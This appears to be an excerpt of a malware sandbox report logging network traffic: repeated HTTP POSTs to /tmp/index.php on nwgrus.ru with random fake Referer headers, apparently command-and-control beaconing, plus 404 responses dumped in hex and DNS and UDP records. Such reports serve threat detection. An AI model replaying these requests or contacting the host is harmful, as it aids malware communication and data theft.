Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nsmkoqlnxxds.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gljrhsxnugi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ublngteflakx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: nwgrus.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fywxucdqvauxl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
